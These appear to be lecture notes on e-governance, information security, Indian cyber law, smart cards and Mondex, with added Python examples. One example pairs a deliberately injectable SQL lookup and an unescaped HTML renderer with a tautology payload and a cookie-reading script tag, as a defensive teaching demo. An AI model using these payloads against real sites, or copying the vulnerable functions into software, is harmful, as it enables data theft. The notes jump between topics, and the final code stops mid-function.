What's the best delivery method?

Design-Bid-Build

Design-Build

Finance-Design-Build

What do current statutes allow?

Procurement Approach

Sole Source, RFP, Low Bid

Risk Allocation between Public and private Partners

Structuring of Contract: Risks and Rewards


Implement

Environmental

Design

Permitting

Construction

Commissioning and Administration

Operate

Startup

Monitoring

Assessment

Enhancement

Contract Modifications

Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest the efficiencies gained from ICT-enabled public administration.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index also tend to have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services, and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION. The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of the service.

2. INFORMATION SECURITY. A central challenge of e-Government services is how the new technology can be used not only to increase efficiency for public administration, but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

- understanding an organization's information security requirements and the need to establish policy and objectives for information security;

- implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;

- monitoring and reviewing the performance and effectiveness of the ISMS;

- continual improvement based on objective measurement.

Data security requires a set of security requirements:

- Authentication: the capability to identify who is using the services (a person or a software program); the process of verifying that you are who you say you are.

- Authorization: the capability to grant rights of access to resources; the process of verifying that someone has the right to do what they are trying to do.

- Confidentiality: the capability to prevent unauthorized access to information.

- Integrity: the capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.

- Traceability: the capability to chronologically relate any transaction to the person or system that performed the action, in a way that is verifiable.

- Non-repudiation: the capability to prevent a person or system that took part in an event or action from denying or challenging their participation in it.

Examples of organizational and technical measures to prevent unauthorized access and processing are:

- Protecting premises, equipment and systems software, including input-output units

- Protecting software applications used to process personal data

- Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks

- Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data

- Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
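The Integrity and Traceability requirements listed above, and the last organizational measure (determining when personal data were processed and by whom), can be implemented as a hash-chained audit log. The example below is added here and is not from the original notes or any named product; the class and function names (AuditLog, verify, who_touched), the key and the records are hypothetical and constructed. It uses only Python's standard library.

```python
"""Tamper-evident, attributable audit trail for an e-Government service.

Added example, not from the original notes or any named product. It turns
the Integrity and Traceability requirements into code: every action is
recorded with the acting principal and a timestamp, each record carries an
HMAC over its own fields plus the previous record's tag, and verification
reports the first record that was edited, deleted or reordered.

A shared HMAC key gives integrity, not non-repudiation; the latter needs a
per-signer private key. In production the key lives in an HSM and the log
goes to write-once storage.
"""
import hashlib
import hmac
import json

GENESIS_TAG = "0" * 64
FIELDS = ("seq", "ts", "actor", "action", "target")


def _tag(key: bytes, prev_tag: str, body: dict) -> str:
    # Canonical JSON so the same record always serialises identically.
    payload = json.dumps({k: body[k] for k in FIELDS},
                         sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(key, prev_tag.encode() + payload, hashlib.sha256).hexdigest()


class AuditLog:
    def __init__(self, key: bytes):
        self._key = key
        self.records = []

    def record(self, actor: str, action: str, target: str, ts: str) -> dict:
        prev = self.records[-1]["tag"] if self.records else GENESIS_TAG
        body = {"seq": len(self.records), "ts": ts, "actor": actor,
                "action": action, "target": target}
        entry = dict(body, prev=prev, tag=_tag(self._key, prev, body))
        self.records.append(entry)
        return entry

    @property
    def head(self) -> str:
        """Latest tag; store it on a separate system to detect truncation."""
        return self.records[-1]["tag"] if self.records else GENESIS_TAG


def verify(records, key: bytes, expected_head=None):
    """Return (True, None) if intact, else (False, index of first bad record).

    Chaining alone cannot detect that records were dropped from the end;
    pass the head tag that was stored separately to catch truncation.
    """
    prev = GENESIS_TAG
    for i, rec in enumerate(records):
        if rec.get("seq") != i or rec.get("prev") != prev:
            return False, i
        if not hmac.compare_digest(_tag(key, prev, rec), rec["tag"]):
            return False, i
        prev = rec["tag"]
    if expected_head is not None and not hmac.compare_digest(prev, expected_head):
        return False, len(records)
    return True, None


def who_touched(records, target: str):
    """Traceability query: chronological (ts, actor, action) for one object."""
    return [(r["ts"], r["actor"], r["action"]) for r in records if r["target"] == target]


def demo() -> dict:
    """Constructed scenario: three actions, then an edit and a truncation."""
    key = b"demo-key-not-for-production"  # constructed; a real key lives in an HSM
    log = AuditLog(key)
    log.record("clerk:asha", "create", "application/771", "2024-01-05T09:12:00Z")
    log.record("officer:bilal", "approve", "application/771", "2024-01-06T14:02:00Z")
    log.record("clerk:asha", "read", "application/772", "2024-01-06T15:30:00Z")
    head = log.head

    tampered = json.loads(json.dumps(log.records))   # deep copy
    tampered[1]["actor"] = "clerk:asha"                # rewrite who approved

    truncated = log.records[:-1]                       # drop the last record
    return {
        "intact": verify(log.records, key, head),
        "edited": verify(tampered, key, head),
        "silent": verify(truncated, key),              # passes without the head
        "caught": verify(truncated, key, head),        # fails with it
        "trail": who_touched(log.records, "application/771"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

Each entry answers the traceability question directly (who did what to which object, and when), and the chain makes the answer verifiable: changing the actor of the approval, removing a middle record, or verifying with the wrong key all fail at the first affected index. The one thing chaining cannot see is silent removal of the newest records, which is why the head tag is stored elsewhere.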

Although trusted security and privacy measures constitute a crucial success factor for e-Government, this has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44% of countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS. Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Documented cyber attacks use techniques such as packet sniffers, probes, malware, internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

- Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis

- Maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness

- Continually improve its control environment

- Effectively achieve legal and regulatory compliance

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found 816 e-Government web sites from 212 different countries vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. A SQL injection attack can compromise data integrity (and, since the attacker controls the query, confidentiality), while XSS is a vulnerability which attackers may exploit to steal users' information.
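Both vulnerabilities named in the study can be shown side by side with their fixes. The following is an added example, not code from the notes or from the research cited; the citizens table, its rows and the function names are hypothetical and constructed, and it uses only Python's built-in sqlite3 and html modules.

```python
"""SQL injection and XSS in a citizen-lookup handler: vulnerable vs hardened.

Added example, not code from the notes or from the cited research. It uses an
in-memory SQLite table with constructed rows; the table name, column names
and function names are hypothetical. The vulnerable pair is kept deliberately
broken to show the effect; the safe pair is the fix.
"""
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data for a benefits portal."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE citizens (national_id TEXT PRIMARY KEY, name TEXT, benefit TEXT)")
    conn.executemany("INSERT INTO citizens VALUES (?, ?, ?)", [
        ("A100", "Asha", "pension"),
        ("B200", "Bilal", "housing"),
        ("C300", "Chen", "none"),
    ])
    return conn


# --- SQL injection -------------------------------------------------------

def lookup_vulnerable(conn, national_id: str) -> list:
    # The input is spliced into the SQL text, so it can change the query's logic.
    sql = ("SELECT national_id, name, benefit FROM citizens "
           "WHERE national_id = '" + national_id + "'")
    return conn.execute(sql).fetchall()


def lookup_safe(conn, national_id: str) -> list:
    # Bound parameter: the driver sends the value separately from the SQL text,
    # so quotes in the input are data, never syntax.
    sql = "SELECT national_id, name, benefit FROM citizens WHERE national_id = ?"
    return conn.execute(sql, (national_id,)).fetchall()


# --- Cross-site scripting ------------------------------------------------

def render_vulnerable(query: str, rows: list) -> str:
    # Reflects the user's search string and DB values into HTML unescaped.
    items = "".join(f"<li>{r[0]}: {r[1]} ({r[2]})</li>" for r in rows)
    return f"<p>Results for {query}</p><ul>{items}</ul>"


def render_safe(query: str, rows: list) -> str:
    # Contextual output encoding for HTML text content (not for attributes,
    # URLs or script blocks, which need their own encoders).
    e = html.escape
    items = "".join(f"<li>{e(r[0])}: {e(r[1])} ({e(r[2])})</li>" for r in rows)
    return f"<p>Results for {e(query)}</p><ul>{items}</ul>"


SQLI_PAYLOAD = "' OR '1'='1"          # turns the WHERE clause into a tautology
XSS_PAYLOAD = "<script>alert(document.cookie)</script>"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable rows:", len(lookup_vulnerable(db, SQLI_PAYLOAD)))  # 3: whole table
    print("safe rows:", len(lookup_safe(db, SQLI_PAYLOAD)))             # 0
    print(render_safe(XSS_PAYLOAD, lookup_safe(db, "A100")))
```

The injection payload is plain data for lookup_safe because the driver binds it as a value; with string concatenation it becomes part of the SQL grammar and returns every row. Escaping at output time is what defeats the reflected XSS; validating input is worthwhile as defence in depth but is not a substitute, since the same value may later be rendered in several contexts.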

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained in cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies, and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality or social order, or any unjust or shameful act. 'Offence' is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage, information warfare and related activities.

Pornography, threatening email, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber squatting is the act of registering a famous domain name and then selling it for a fortune. This is an issue that has not been tackled in the IT Act 2000.

Phishing is just one of the many frauds on the Internet that try to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of financial institutions, requesting them to enter their username, password or other personal information to access their account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services. Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base:

• 121 million Internet users

• 65 million active Internet users, up by 28% from 51 million in 2010

• 50 million users shop online on e-commerce and online shopping sites

• 46+ million social network users

• 346 million mobile users had subscribed to data packages


CYBER LAW

(1) Whoever, with the intent to cause, or knowing that he is likely to cause, wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Section 43: Whoever, without permission of the owner of the computer,

o secures access;

o downloads, copies or extracts any data, computer database or any information;

o introduces or causes to be introduced any virus or contaminant;

o disrupts or causes disruption;

o denies or causes denial of access to any person;

o provides any assistance to any person to facilitate access;

o charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section 43 (continued):

o destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means;

o steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years, or with fine which may extend to five lakh rupees, or with both." [S66]

S 66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

o any information that is grossly offensive or has menacing character; or

o any information which he knows to be false, but, for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes use of such computer resource or communication device; or

o any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or mislead the addressee or recipient about the origin of such messages,

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years, or with fine not exceeding two lakh rupees, or with both."

S 67A - Punishment for publishing or transmitting material containing a sexually explicit act, etc., in electronic form

"Whoever publishes or transmits, or causes to be published or transmitted, in the electronic form any material which contains a sexually explicit act or conduct, shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67C - Preservation and retention of information by intermediaries

"(1) Intermediaries shall preserve and retain such information as may be specified, for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. The Act has been opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce drawn up by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It received Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security; it has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters; four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

Information Technology Act 2000 addressed the following issues

1 Legal recognition of electronic documents

2 Legal Recognition of digital signatures

3 Offenses and contraventions

4 Justice dispensation systems for cybercrimes

Offences -

Section 65: Tampering with computer source documents. Intentional concealment, destruction or alteration of computer source code when the source code is required to be kept or maintained by law for the time being in force. Punishment: imprisonment up to three years, or a fine up to 2 lakh rupees, or both.

Section 66: Hacking (in the 2008 amended Act this section covers computer related offences generally). Punishment: imprisonment up to three years, or a fine up to 5 lakh rupees, or both.

Section 66-A: Sending offensive messages through electronic means. Sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, or sending such mail intended to deceive or mislead the addressee or recipient about the origin of the message. Punishment: imprisonment up to three years and a fine.

Criticisms -

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments for lacking the legal and procedural safeguards needed to prevent violation of the civil liberties of Indians. Other observers have welcomed the amendments because they address cyber security.

Section 69 empowers the Central Government, a State Government or their authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient to do so in the interest of the sovereignty or integrity of India, the defence of India, the security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for the investigation of any offence. They can also compel assistance from computer personnel in decrypting data (mandatory decryption), under penalty of imprisonment.

Section 66A is widely criticized, and the press has reported numerous abuses under it. Its constitutional validity was challenged in the Lucknow and Madras High Courts, and, relying on Section 66A, the Bombay High Court held that creating a website and storing false information on it can amount to cyber crime. (After these notes were compiled, the Supreme Court of India struck down Section 66A as unconstitutional in Shreya Singhal v. Union of India, 24 March 2015; the section still appears in the offences list above because the text predates that ruling.)


Payment by direct debit: the customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to the user's PayPal account and allows transactions of less than US$12 to take place. As of 2013 the service is offered in select currencies only.

Micropayment uses -

Publishing
Marketing
Software
Entertainment
Web services

SMART CARD

A smart card, chip card or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009 a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing. Smart cards may provide strong authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

What is a Smart Card?

Standard credit card-sized, with a microchip embedded in it
Two types: memory-only chips and microprocessor chips
Can hold up to 32,000 bytes (a figure typical of the cards these notes describe)
Newer smart cards have cryptographic co-processors, so they can perform complex encryption routines quickly
In 1968 German inventors patented the combination of plastic cards with microchips
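The input-process-output model described above is exercised through short command and response messages called APDUs (ISO/IEC 7816-4): the terminal sends a command, the chip processes it and answers with data plus a two-byte status word. The following is an added example, not code from the original notes or from any card vendor: it encodes and decodes short-form APDUs, splits a response from its status word, and drives a constructed toy card that guards a file behind a PIN with a retry counter, the kind of check a microprocessor card enforces inside the chip rather than in the terminal. The ToyCard class, its PIN, its file contents and which status words it returns are assumptions made for illustration; only the APDU layout and the listed status-word meanings come from the standard.

```python
# Added example: ISO/IEC 7816-4 short-form APDU encoding/decoding with a
# constructed toy card. Not from the lecture notes or any real card product.
from dataclasses import dataclass
from typing import Optional


@dataclass
class CommandAPDU:
    cla: int                    # class byte
    ins: int                    # instruction byte, e.g. 0x20 VERIFY, 0xB0 READ BINARY
    p1: int
    p2: int
    data: bytes = b""           # command data (Lc bytes)
    le: Optional[int] = None    # expected response length; None = no response data

    def to_bytes(self) -> bytes:
        if not all(0 <= v <= 0xFF for v in (self.cla, self.ins, self.p1, self.p2)):
            raise ValueError("header bytes must be in 0..255")
        if len(self.data) > 255:
            raise ValueError("short-form APDU carries at most 255 data bytes")
        out = bytes([self.cla, self.ins, self.p1, self.p2])
        if self.data:
            out += bytes([len(self.data)]) + self.data   # Lc followed by data
        if self.le is not None:
            out += bytes([self.le & 0xFF])               # Le; 0x00 means "up to 256"
        return out


def parse_command(raw: bytes) -> CommandAPDU:
    """Decode a short-form command APDU (ISO 7816-4 cases 1 to 4)."""
    if len(raw) < 4:
        raise ValueError("APDU shorter than the 4-byte header")
    cla, ins, p1, p2 = raw[:4]
    body = raw[4:]
    if not body:                                      # case 1: header only
        return CommandAPDU(cla, ins, p1, p2)
    if len(body) == 1:                                # case 2: header + Le
        return CommandAPDU(cla, ins, p1, p2, le=body[0])
    lc, data, rest = body[0], body[1:1 + body[0]], body[1 + body[0]:]
    if len(data) != lc:
        raise ValueError("Lc does not match the data present")
    if not rest:                                      # case 3: header + Lc + data
        return CommandAPDU(cla, ins, p1, p2, data)
    if len(rest) == 1:                                # case 4: header + Lc + data + Le
        return CommandAPDU(cla, ins, p1, p2, data, le=rest[0])
    raise ValueError("unexpected bytes after Le")


def split_response(raw: bytes):
    """Return (response data, status word); every response ends in SW1 SW2."""
    if len(raw) < 2:
        raise ValueError("response must end with SW1 SW2")
    return raw[:-2], int.from_bytes(raw[-2:], "big")


def describe_status(sw: int) -> str:
    # Standard status words; 63 CX carries the remaining PIN retries in X.
    if sw & 0xFFF0 == 0x63C0:
        return f"verification failed, {sw & 0x0F} tries left"
    return {0x9000: "success", 0x6982: "security status not satisfied",
            0x6983: "authentication method blocked",
            0x6D00: "instruction not supported"}.get(sw, f"unknown status {sw:04X}")


class ToyCard:
    """Constructed stand-in for a microprocessor card: one file readable only
    after a PIN is verified, with a retry counter that blocks the PIN at zero.
    A real card keeps the PIN and counter in tamper-resistant memory."""

    def __init__(self, pin: bytes = b"1234", tries: int = 3):
        self._pin, self._tries, self._unlocked = pin, tries, False
        self._file = b"balance=100"                   # sample content, constructed

    def transmit(self, raw: bytes) -> bytes:
        cmd = parse_command(raw)
        if cmd.ins == 0x20:                           # VERIFY
            if self._tries == 0:
                return b"\x69\x83"                    # blocked: no more attempts
            if cmd.data == self._pin:
                self._unlocked = True
                return b"\x90\x00"
            self._tries -= 1
            return bytes([0x63, 0xC0 | self._tries])  # wrong PIN, X tries left
        if cmd.ins == 0xB0:                           # READ BINARY
            if not self._unlocked:
                return b"\x69\x82"                    # security status not satisfied
            return self._file[:cmd.le or 256] + b"\x90\x00"
        return b"\x6D\x00"                            # instruction not supported


def read_balance(card: ToyCard, pin: bytes):
    """Terminal-side sequence: VERIFY, then READ BINARY only if the PIN was accepted."""
    _, sw = split_response(card.transmit(CommandAPDU(0x00, 0x20, 0x00, 0x80, pin).to_bytes()))
    if sw != 0x9000:
        return None, sw
    return split_response(card.transmit(CommandAPDU(0x00, 0xB0, 0x00, 0x00, le=0x00).to_bytes()))


if __name__ == "__main__":
    card = ToyCard()
    for attempt in (b"0000", b"1234"):
        data, sw = read_balance(card, attempt)
        print(attempt, data, describe_status(sw))
```

The point of keeping the PIN check and the retry counter inside `ToyCard.transmit` is that the terminal never sees the PIN's correct value and cannot reset the counter; that is the property the notes mean by "tamper-resistant storage of user and account identity".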

Construction of Smart Cards - (figure not reproduced in this transcript)

Why Smart Cards -

Improve the convenience and security of any transaction
Provide tamper-resistant storage of user and account identity (no card is truly tamper-proof; the chip raises the cost of extracting or altering its contents)
Provide vital components of system security
Protect against a wide range of security threats

Advantages -

Flexibility
Security
Portability
Increasing data storage capacity
Reliability

Schematic overview of a smart card - (figure not reproduced in this transcript)

Smart card processing - (figure not reproduced in this transcript)

Smart Card Applications -

Ticketless travel
  Seoul bus system: 4M cards, 1B transactions since 1996
  Planned: the SF Bay Area system
Authentication, ID
Medical records
E-cash
Store loyalty programs
Personal profiles
Government
  Licenses
Mall parking
Example: Mondex

OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

Features:

Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks, etc.
Keeps transaction records
Password protection and "lock card" functions
Portable balance finder to check the balance
Support for multiple currencies

ADVANTAGES

CONSUMER -

Convenience
Accessibility
On-chip record of recent transactions
Home load
Internet purchases

MERCHANT -

Reliable off-line payment
Higher security
Low transaction cost
Reduced cash handling

FINANCIAL INSTITUTION -

Strengthened customer relationships
New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, on the initiative of NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe, and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy? -

Principles protected:

o limits for collecting personal information
o limits for using, disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information

Limits for collecting personal information:

o loads from account
o deposits into account
o lost transactions

Limits for using, disclosing and keeping personal information:

o safeguard deposits
o to reimburse for non-performance

Keeping personal information accurate:

o load and unload are online
o a rolling log of 10 transactions provides the exact spend and retailer name

Safeguarding personal information:

o firewalls in MULTOS between applications (ITSEC E6 designation)
o transaction data sent to the retailer is deliberately limited
o individual transaction data is not collected by banks; Mondex is an unaudited system

The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then use the card to make purchases up to the total cash value held on it. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology, and can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995, before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card can make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit or debit card to make a purchase, communication is required between the bank and your card. Mondex cards instead contain an embedded microprocessor with cryptographic protection and tamper-resistant hardware designed to protect them from attackers; because the value lives on the card, its security rests on that hardware rather than on a bank authorizing each transaction. The ability of the Mondex smart card to do offline transactions means it is less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they are recorded in the memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM, or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage of Mondex is that transactions are not truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you cannot purchase a Mondex card without revealing your identity. Each card has a unique identification number through which the owner can easily be identified. Mondex smart cards have not been as successful as originally predicted, and customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you lose a Mondex smart card: losing a Mondex card is just like losing a wallet full of cash. With a credit card you are protected against any loss exceeding $50; this protection is not currently available with a Mondex smart card.

According to Mondex, the system is fully auditable: there is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex cannot claim to be a fully auditable system. After a number of transactions, overflow can occur because of the limited memory in the Mondex smart card, which means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.
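The rolling 10-transaction log mentioned under "Keeping personal information accurate" and the overflow problem described just above are two views of the same design choice. The simulation below is an added example, not Mondex code or the notes' own material: two purses exchange value offline, each keeping a bounded log, and an issuer-side reconciliation then shows what the bank can and cannot reconstruct once the log has overflowed. The purse layout, the 10-entry log size, the pence amounts and the sample transactions are constructed assumptions; a real purse would also sign and authenticate each transfer, which this sketch omits.

```python
# Added example: simulation of an offline electronic purse with a rolling
# on-card transaction log, to show how a bounded log weakens auditability.
# Not Mondex code; purse layout, log size and sample values are assumptions.
from collections import deque
from dataclasses import dataclass, field

LOG_SIZE = 10   # the notes say the card keeps a rolling log of 10 transactions


@dataclass
class Purse:
    card_id: str
    balance: int = 0          # stored value, in pence
    seq: int = 0              # monotonic counter; survives log overflow
    locked: bool = False      # the "lock card" function from the feature list
    log: deque = field(default_factory=lambda: deque(maxlen=LOG_SIZE))

    def record(self, kind: str, amount: int, counterparty: str) -> None:
        self.seq += 1
        # at maxlen the oldest entry is silently discarded: the overflow in the text
        self.log.append((self.seq, kind, amount, counterparty))


def load(purse: Purse, amount: int) -> None:
    """Online load from the holder's bank account; the bank records this itself."""
    if amount <= 0:
        raise ValueError("load amount must be positive")
    purse.balance += amount
    purse.record("load", amount, "bank")


def pay(payer: Purse, payee: Purse, amount: int) -> None:
    """Offline card-to-card transfer: no bank is consulted, so the cards alone
    enforce the checks, and the only record is what each card logs."""
    if amount <= 0:
        raise ValueError("amount must be positive")
    if payer.locked:
        raise PermissionError("payer card is locked")
    if payer.balance < amount:
        raise ValueError("insufficient value on card")
    payer.balance -= amount
    payee.balance += amount
    payer.record("debit", amount, payee.card_id)
    payee.record("credit", amount, payer.card_id)


def reconcile(purse: Purse, bank_loads: int) -> dict:
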